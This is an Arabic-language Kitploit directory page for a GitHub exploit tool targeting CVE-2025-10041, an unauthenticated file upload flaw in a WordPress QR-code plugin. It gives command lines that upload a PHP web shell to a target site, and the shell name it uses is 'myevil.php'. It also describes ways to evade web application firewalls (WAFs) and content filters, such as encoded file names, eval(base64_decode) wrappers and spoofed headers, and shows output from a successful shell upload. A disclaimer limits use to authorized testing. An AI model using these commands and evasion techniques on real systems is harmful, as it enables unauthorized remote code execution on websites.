Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-10041 — Flex QR Code Generator <= 1.2.5 - رفع ملف عشوائي بدون مصادقة | Kitploit
أدوات/GitHubGitHub/nxploited/cve-2025-10041
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالالتهرب من IDS/IPSاستغلال تطبيقات الويبتجاوز WAF
GitHubnxploited/cve-2025-10041

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - رفع ملف عشوائي بدون مصادقة

عرض المستودع
3منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2025-10041

Flex QR Code Generator <= 1.2.5 - رفع ملفات اعتباطي بدون مصادقة

🚨 Flex QR Code Generator ≤ 1.2.5 - رفع ملفات اعتباطي بدون مصادقة


📝 الوصف

إضافة Flex QR Code Generator لووردبريس معرضة لرفع ملفات اعتباطي بسبب عدم التحقق من نوع الملف في دالة save_qr_code_to_db() في جميع الإصدارات حتى 1.2.5 ضمناً.
يسمح ذلك لـ المهاجمين بدون مصادقة برفع ملفات ضارة على خادم الموقع المستهدف، مما قد يؤدي إلى تنفيذ تعليمات برمجية عن بُعد.

  • CVE: CVE-2025-10041
  • CVSS: 9.8 (حرج)

💡 حول هذا السكريبت

CVE-2025-10041.py هو أداة استغلال احترافية مصممة لأتمتة الهجوم من خلال استغلال هذه الثغرة.
توفر ميزات متقدمة لتجاوس الحمايات الشائعة وتقنيات الترميز.


⚙️ الميزات

  • اكتشاف تلقائي للثغرة (فحص الإصدار)
  • رفع ملفات اعتباطي (بما في ذلك قوالب PHP)
  • تجاوس ترميز اسم الملف: Base64 أو URL
  • تجاوس ترميز المحتوى: غلاف Base64 PHP لشفرة القالب
  • رؤوس HTTP عشوائية لتجنب جدران الحماية الأساسية
  • دعم الرؤوس المخصصة
  • واجهة سطر أوامر كاملة مع تحليل الوسائط ورسالة المساعدة

🖥️ طريقة الاستخدام

1. الاستغلال الأساسي

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com

2. ترميز اسم القالب

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_filename base64
python3 CVE-2025-10041.py -u http://target.com --encode_filename url

3. ترميز محتوى القالب

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64

4. اسم ملف القالب المخصص

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --shellname myevil.php

5. متقدم (دمج الخيارات)

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --encode_content base64 --encode_filename base64 --shellname myevil.php

6. رؤوس مخصصة

root@kitploit:~
python3 CVE-2025-10041.py -u http://target.com --headers "X-Forwarded-For: 127.0.0.1" "Cookie: PHPSESSID=1337"

🆘 المساعدة

لعرض جميع الخيارات المتاحة وتعليمات الاستخدام:

root@kitploit:~
python3 CVE-2025-10041.py --help

🔓 تقنيات التجاوس

  • ترميز اسم الملف: بعض الخوادم تحظر .php أو الأسماء المشبوهة؛ الترميز قد يتجاوز الفلاتر.
  • ترميز المحتوى: تضمين شفرة القالب داخل eval(base64_decode(...)) قد يتجاوز فلاتر المحتوى.
  • رؤوس عشوائية: تدوير وكيل المستخدم والمرجع وملفات تعريف الارتباط لتجنب الاكتشاف.
  • رؤوس مخصصة: إضافة رؤوسك الخاصة لتجاوس متقدم.

📋 مثال على المخرجات

root@kitploit:~
Checking vulnerability version...
Target is vulnerable ...
Exploiting ...
Uploading shell 'shell.php' ...
Shell uploaded successfully.
Shell path (guess): /wp-content/uploads/shell_3.php
Response: {...}

⚠️ إخلاء مسؤولية

هذا السكريبت مقدم لأغراض تعليمية وبحثية واختبارات الاختراق المصرح بها فقط.
الاستخدام غير المصرح به ضد أنظمة لا تملكها أو ليس لديك إذن صريح باختبارها ممنوع منعاً باتاً وغير قانوني.
المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.


✍️ من إعداد:

Nxploited (Khaled Alenazi)


تنزيل الأداة